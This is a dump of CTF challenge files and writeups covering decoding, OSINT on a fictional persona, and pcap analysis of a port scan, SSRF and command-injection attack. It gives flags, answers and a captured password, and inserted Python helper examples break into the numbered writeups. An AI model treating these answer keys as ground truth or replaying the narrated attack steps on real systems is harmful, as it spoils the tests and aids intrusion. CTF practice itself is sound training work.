/Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/README.md:
--------------------------------------------------------------------------------
1 | # Decode the Escape
2 |
3 | Find the Flag.
4 |
5 | ```plaintext
6 | "Some will call it practice, some will call that luck,
7 | But either way you're going to the history books"
8 |
9 | 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
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | First of all, we need to search for the song lyrics given in the task. It’s the song called **Hall of Fame** by The Script:
4 |
5 | 
6 |
7 | The secret message given to us is a Base58-encoded value:
8 |
9 | 
10 |
11 | The decoded text still looks like a cipher. Since the song is presumably there for a reason (as key material), we can guess that the ciphertext is the result of a Vigenère cipher.
12 |
13 | ***But what is the key?***
14 |
15 | Let’s try the song name - “**halloffame**” - and see the result:
16 |
17 | 
18 |
19 | Yes, it is the right key! We are given another message:
20 |
21 | **“Happiness can be found, even in the darkest of times, if one only remembers to turn on the light.”**
22 |
23 | **How can you fight off this prison's guards?**
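The two CyberChef steps used above, Base58 decoding followed by Vigenère decryption, reimplemented in Python as an added example that is not part of this writeup. It assumes the Bitcoin Base58 alphabet (CyberChef's default) and the usual letters-only Vigenère convention in which spaces and punctuation pass through and do not advance the key. The challenge's real ciphertext is not reproduced; the sample input is constructed by re-encrypting the message recovered above with the key `halloffame`.

```python
"""Added example (not the writeup's own code): Base58 decoding followed by
Vigenere decryption, the pipeline the writeup runs in CyberChef."""

# Bitcoin-style Base58 alphabet (no 0, O, I, l); assumed to match CyberChef's default.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Decode Base58 text to bytes. Each leading '1' encodes one leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)  # raises ValueError on a bad character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58 (used here to build the constructed sample input)."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def vigenere(text: str, key: str, decrypt: bool) -> str:
    """Classic Vigenere over ASCII letters. Non-letters pass through unchanged and do
    not advance the key; letter case is preserved. Non-letters in the key are ignored."""
    shifts = [ord(k) - ord("a") for k in key.lower() if k.isascii() and k.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, i = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            s = shifts[i % len(shifts)]
            if decrypt:
                s = -s
            out.append(chr((ord(ch) - base + s) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def solve(b58_cipher: str, key: str) -> str:
    """The writeup's pipeline: Base58 -> text, then Vigenere-decrypt with `key`."""
    return vigenere(b58decode(b58_cipher).decode("utf-8"), key, decrypt=True)


if __name__ == "__main__":
    # Constructed input: the message the writeup recovers, re-encrypted with its key.
    plaintext = ("Happiness can be found, even in the darkest of times, "
                 "if one only remembers to turn on the light.")
    cipher = b58encode(vigenere(plaintext, "halloffame", decrypt=False).encode())
    print(cipher)
    print(solve(cipher, "halloffame"))
```

Because the key advances only on letters, punctuation and spacing survive decryption intact, which is why the recovered message above reads as clean English.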
24 |
25 | The first quote is from “Harry Potter and the Prisoner of Azkaban”, as a quick Google search confirms:
26 |
27 | 
28 |
29 | As we can guess, Azkaban is the name of a prison. So we need another search to find out how to fight off the guards of this prison.
30 |
31 | The guards of Azkaban are called **Dementors**:
32 |
33 | 
34 |
35 | We can fight off Dementors with…
36 |
37 | 
38 |
39 | The Patronus Charm! Good. We collected some information, so let’s analyze the secret message. It is another Base64-encoded value:
40 |
41 | 
42 |
43 | Well, it does not work. We have to look for another way.
44 |
45 | However, searching for the Patronus Charm on Google gives us something juicy:
46 |
47 | 
48 |
49 | Let’s raise our wands and say the magic words:
50 |
51 | 
52 |
53 | The spell worked! Challenge solved! 🪄🪄🪄
54 |
55 | Flag: **`ICSD_2024{a9Vb44x55wLt4Pn8KrHd}`**
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/README.md:
--------------------------------------------------------------------------------
1 | **C3 - ANAIS_WATT3RS0N**
2 |
3 | *Anais Watterson's beloved donkey doll, was thrown from a school bus by other children. Unfortunately, Anais has lost not only a beloved toy but also a hidden flag within it that holds great importance to her. Now she needs your assistance to retrieve it. Anais has created a Twitter account to share clues and reach as many people as possible to aid in the search. Your mission is to retrace the hints, find the doll, and bring it back. Ready to help Anais recover her treasured possession and restore her smile?*
4 |
5 | 
6 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/Writeup.md:
--------------------------------------------------------------------------------
1 | # C3 - ANAIS_WATT3RS0N
2 |
3 | The description mentions that Anais created a Twitter account, and the name of the challenge looks like an account handle. We search for it on Twitter (R.I.P.) and find an account:
4 |
5 | 
6 |
7 | Browsing through it, we noticed that Anais first asked for help, and later found some strange, unreadable text stuck to her door:
8 |
9 | 
10 |
11 | From its format, we suspected it might be encoded in one of the Base encoding types, so we used CyberChef (https://gchq.github.io/CyberChef/) to decode it:
12 |
13 | 
14 |
15 | Voilà! We finally cracked it. It revealed the name of a location: Mare Island San Pablo Bay Hiking Trail. We searched for it on Google Maps:
16 |
17 | 
18 |
19 | Usually, in these kinds of puzzles, we find interesting clues in the comments section, so we looked there (sorted by newest):
20 |
21 | 
22 |
23 | That's when we discovered that Tina, the fearsome bully of Elmore Junior High, had taken Anais's doll. But did you know Tina did it because she couldn't sleep at night? Now you know both the flag and the reason behind her actions.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/README.md:
--------------------------------------------------------------------------------
1 | ## #exec cmd="whoami"
2 |
3 | ### Task
4 |
5 | Analyze the picture and answer the questions.
6 |
7 | 
8 |
9 | **Question 1.** Who is the owner of this picture?
10 |
11 | **Question 2.** What is his email address?
12 |
13 | **Question 3.** Which country is he living in?
14 |
15 | **Question 4.** Find the flag.
16 |
17 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | **Question 1.** Who is the owner of this picture?
4 |
5 | The picture’s EXIF metadata (e.g. read with `exiftool`) is enough to answer this:
6 |
7 | 
8 |
9 | **ANSWER**: **Marko Ivan Marojević**
10 |
11 | ---
12 |
13 | **Question 2.** What is his email address?
14 |
15 | Looking at the picture closely, a GitHub logo is visible, so the next step is to search for Marko Ivan on GitHub.
16 |
17 | Searching for **Marko Ivan Marojević** on GitHub:
18 |
19 | 
20 |
21 | GitHub profile of Marko Ivan:
22 |
23 | 
24 |
25 | His profile page readily shows where he studies, where he works and how to contact him.
26 |
27 | **ANSWER**: **ivan.marojevic@prvabankacg.com**
28 |
29 | ---
30 |
31 | **Question 3.** Which country is he living in?
32 |
33 | We can see that Marko is an intern at “Prva banka Crne Gore AD”, in Podgorica. Podgorica is the capital city of Montenegro.
34 |
35 | **ANSWER**: **Montenegro**
36 |
37 | ---
38 |
39 | **Question 4.** Find the flag.
40 |
41 | There is a repository in Marko’s profile:
42 |
43 | 
44 |
45 | And the note on Marko’s profile page reads:
46 |
47 | 
48 |
49 | ***Sometimes it is good to retrospect…*** The hint points at something history-related.
50 |
51 | ***Maybe a commit history?***
52 |
53 | 
54 |
55 | Clicking on the **Commits** link gives us the commit history:
56 |
57 | 
58 |
59 | One of the commits contains a Base64-encoded value; decoding it yields the flag:
60 |
61 | 
62 |
63 | **ANSWER**: **`ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}`**
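The same search can be automated. The script below is an added example, not part of the writeup or of Marko’s repository: it scans text such as the output of `git log -p --all` for Base64 runs and keeps only those that decode to the competition’s `ICSD_2024{...}` flag format. The log excerpt embedded in it is constructed for the demo (commit id, author and diff lines are made up); only the flag value is the one reported above.

```python
"""Added example: find Base64-encoded ICSD flags in git history output."""
import base64
import binascii
import re
import sys

FLAG_RE = re.compile(r"ICSD_2024\{[^}]+\}")
# A run of whole Base64 quads (at least 16 chars, so ordinary words are skipped),
# optional padding, not glued to other Base64 characters on either side.
B64_RE = re.compile(
    r"(?<![A-Za-z0-9+/=])"
    r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
    r"(?![A-Za-z0-9+/=])"
)

# The flag from the writeup, encoded the way it appeared in the commit.
ENCODED_FLAG = base64.b64encode(b"ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}").decode()

# Constructed sample of `git log -p` output; a removed line still shows up in history.
SAMPLE_LOG = f"""commit deadbeef
Author: example-user <user@example.invalid>

    remove note

diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,2 +1,1 @@
 Sometimes it is good to retrospect...
-{ENCODED_FLAG}
+nothing to see here
"""


def decode_candidates(text):
    """Return (token, decoded_text) for every Base64 run that decodes to printable ASCII."""
    found = []
    for match in B64_RE.finditer(text):
        token = match.group(0)
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError):
            continue  # not valid Base64, or not text once decoded
        if decoded.isprintable():
            found.append((token, decoded))
    return found


def find_flags(text):
    """Decoded candidates that match the flag format exactly."""
    return [decoded for _, decoded in decode_candidates(text) if FLAG_RE.fullmatch(decoded.strip())]


if __name__ == "__main__":
    # Pipe real history in:  git log -p --all | python3 find_flag.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    print(find_flags(text))  # ['ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}'] for the sample
```

The decode step uses `validate=True` and an ASCII check so that long hexadecimal or random-looking runs (commit hashes, minified assets) are discarded rather than reported as noise.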
64 |
65 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/README.md:
--------------------------------------------------------------------------------
1 | # Packet Detective
2 |
3 | In the .pcap file given to you, an attack path of a malicious user has been captured. Analyze it and answer the questions.
4 |
5 | **Question 1.** How many ICMP Echo requests were sent to the target initially?
6 |
7 | **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***)
8 |
9 | **Question 3.** Which port was open?
10 |
11 | **Question 4.** Which football club’s website was hosted on that port?
12 |
13 | **Question 5.** On which port did the attacker host an HTTP server?
14 |
15 | **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)
16 |
17 | **Question 7.** Which port hosted an internal application?
18 |
19 | **Question 8.** What is the name of the file containing sensitive information?
20 |
21 | **Question 9**. What is the password?
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | - **Question 1.** How many ICMP Echo requests were sent to the target initially?
4 | - Filter: **`icmp && ip.src == 192.168.149.131`**
5 |
6 | 
7 |
8 | - ANSWER: **`10`**
9 |
10 | ---
11 |
12 | - **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***)
13 | - Packets **27** to **37** show a port scan.
14 |
15 | 
16 |
17 | - The destination ports of the SYN packets sent from 192.168.149.131 tell us which ports were probed.
18 |
19 | - ANSWER: **`22,80,4000,5000,8080`**
20 |
21 | ---
22 |
23 | - **Question 3.** Which port was open?
24 | - In the scan capture, only port **`4000`** answered with **`[SYN, ACK]`**. The attacker then sent a **`RST`** instead of completing the handshake, which is the signature of a half-open (SYN) scan: the SYN/ACK alone is enough to know the port is open.
25 |
26 | - ANSWER: **`4000`**
27 |
28 | ---
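The first three answers can be reproduced without Wireshark. The script below is an added example, not part of the writeup: a minimal classic-pcap reader (standard library only) that counts ICMP echo requests, lists the ports a SYN scan touched and reports which of them replied SYN/ACK. The attacker address is the one from the writeup; the target address and the capture bytes are constructed here for demonstration and are not the challenge `pcapng` (this parser handles the classic pcap format only, so convert with `editcap -F pcap` before pointing it at a real pcapng).

```python
"""Added example: SYN-scan triage over a (constructed) pcap capture."""
import struct

ATTACKER = "192.168.149.131"   # from the writeup
TARGET = "192.168.149.130"     # assumed for the constructed sample

SYN, RST, ACK = 0x02, 0x04, 0x10
ETH_IPV4 = b"\x08\x00"
PROTO_ICMP, PROTO_TCP = 1, 6


def ip_bytes(addr):
    return bytes(int(octet) for octet in addr.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


# --- builders used only to construct the sample capture -----------------------
def frame_ipv4(src, dst, proto, payload):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, ip_bytes(src), ip_bytes(dst))  # checksum left zero
    return b"\x00" * 12 + ETH_IPV4 + hdr + payload             # dummy Ethernet header


def tcp(sport, dport, flags):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)


def icmp_echo_request():
    return struct.pack("!BBHHH", 8, 0, 0, 1, 1)


def pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


def sample_capture():
    """Ten pings, then a SYN scan of five ports of which only 4000 is open."""
    frames = [frame_ipv4(ATTACKER, TARGET, PROTO_ICMP, icmp_echo_request()) for _ in range(10)]
    for port in (22, 80, 4000, 5000, 8080):
        frames.append(frame_ipv4(ATTACKER, TARGET, PROTO_TCP, tcp(40000, port, SYN)))
        if port == 4000:
            frames.append(frame_ipv4(TARGET, ATTACKER, PROTO_TCP, tcp(port, 40000, SYN | ACK)))
            frames.append(frame_ipv4(ATTACKER, TARGET, PROTO_TCP, tcp(40000, port, RST)))  # half-open scan
        else:
            frames.append(frame_ipv4(TARGET, ATTACKER, PROTO_TCP, tcp(port, 40000, RST | ACK)))
    return pcap(frames)


# --- reader ---------------------------------------------------------------------
def frames_of(data):
    if struct.unpack("<I", data[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian classic pcap")
    off = 24
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl]
        off += incl


def parse(frame):
    """Decode Ethernet/IPv4 and the TCP or ICMP fields we need; None for other traffic."""
    if frame[12:14] != ETH_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    pkt = {"proto": ip[9], "src": ip_str(ip[12:16]), "dst": ip_str(ip[16:20])}
    l4 = ip[ihl:]
    if pkt["proto"] == PROTO_TCP:
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", l4[:4])
        pkt["flags"] = l4[13]
    elif pkt["proto"] == PROTO_ICMP:
        pkt["type"] = l4[0]
    return pkt


def analyze(data, attacker, target):
    """Return (echo_requests, scanned_ports, open_ports) for attacker -> target."""
    echo, scanned, open_ports = 0, set(), set()
    for frame in frames_of(data):
        p = parse(frame)
        if p is None:
            continue
        to_target = p["src"] == attacker and p["dst"] == target
        from_target = p["src"] == target and p["dst"] == attacker
        if p["proto"] == PROTO_ICMP and to_target and p["type"] == 8:
            echo += 1
        elif p["proto"] == PROTO_TCP and to_target and (p["flags"] & (SYN | ACK)) == SYN:
            scanned.add(p["dport"])                 # bare SYN = probe
        elif p["proto"] == PROTO_TCP and from_target and (p["flags"] & (SYN | ACK)) == (SYN | ACK):
            open_ports.add(p["sport"])              # SYN/ACK = port open
    return echo, sorted(scanned), sorted(open_ports)


if __name__ == "__main__":
    print(analyze(sample_capture(), ATTACKER, TARGET))  # (10, [22, 80, 4000, 5000, 8080], [4000])
```

The two TCP conditions are the programmatic form of the Wireshark filters `tcp.flags.syn == 1 && tcp.flags.ack == 0 && ip.src == 192.168.149.131` (probes) and `tcp.flags.syn == 1 && tcp.flags.ack == 1 && ip.dst == 192.168.149.131` (open-port replies).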
29 |
30 | - **Question 4.** Which football club’s website was hosted on that port?
31 | - Following the HTTP stream from packet 61 is enough to identify the site:
32 |
33 | 
34 |
35 | - ANSWER: **`Qarabagh`**
36 |
37 | ---
38 |
39 | - **Question 5.** On which port did the attacker host an HTTP server?
40 | - Packet 105 shows a request to the attacker’s own HTTP server, listening on port 8888.
41 |
42 | 
43 |
44 | - ANSWER: **`8888`**
45 |
46 | ---
47 |
48 | - **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)
49 | - The attacker supplied URLs that the target’s web application fetched on its behalf (first the attacker’s listener on port 8888, then services on the target’s localhost), which is a **Server-Side Request Forgery** attack.
50 |
51 | - ANSWER: **`Server-Side Request Forgery`**
52 |
53 | ---
54 |
55 | - **Question 7.** Which port hosted an internal application?
56 | - The SSRF request to localhost port **4455** succeeded, revealing an internal application:
57 |
58 | 
59 |
60 | - ANSWER: **`4455`**
61 |
62 | ---
63 |
64 | - **Question 8.** What is the name of the file containing sensitive information?
65 | - Through the internal application, the attacker exploited a command injection vulnerability to read a file named **`github-pass`**:
66 |
67 | 
68 |
69 | - ANSWER: **`github-pass`**
70 |
71 | ---
72 |
73 | - **Question 9**. What is the password?
74 | - Following the HTTP stream for packet number 2051:
75 |
76 | 
77 |
78 | - ANSWER: **`Mar0j3vic_2024!$`**
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/README.md:
--------------------------------------------------------------------------------
1 |
2 | # Exorcising Sukuna’s Curse
3 |
4 | *The network has been cursed by Sukuna’s influence. As a jujutsu sorcerer, you must help Yuta track down the cursed flags hidden within the system, each like one of Sukuna’s fingers. Uncover the full extent of the breach and aid Yuta in defeating the King of Curses before the network falls. Can you exorcise Sukuna’s curse in time?*
5 |
6 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/Writeup.md:
--------------------------------------------------------------------------------
1 |
2 | ### **Exorcising Sukuna’s Curse**
3 |
4 | 
5 |
6 | ---
7 |
8 | ## CONNECTION
9 |
10 | Let’s start the machine and connect with OpenVPN.
11 |
12 | ```bash
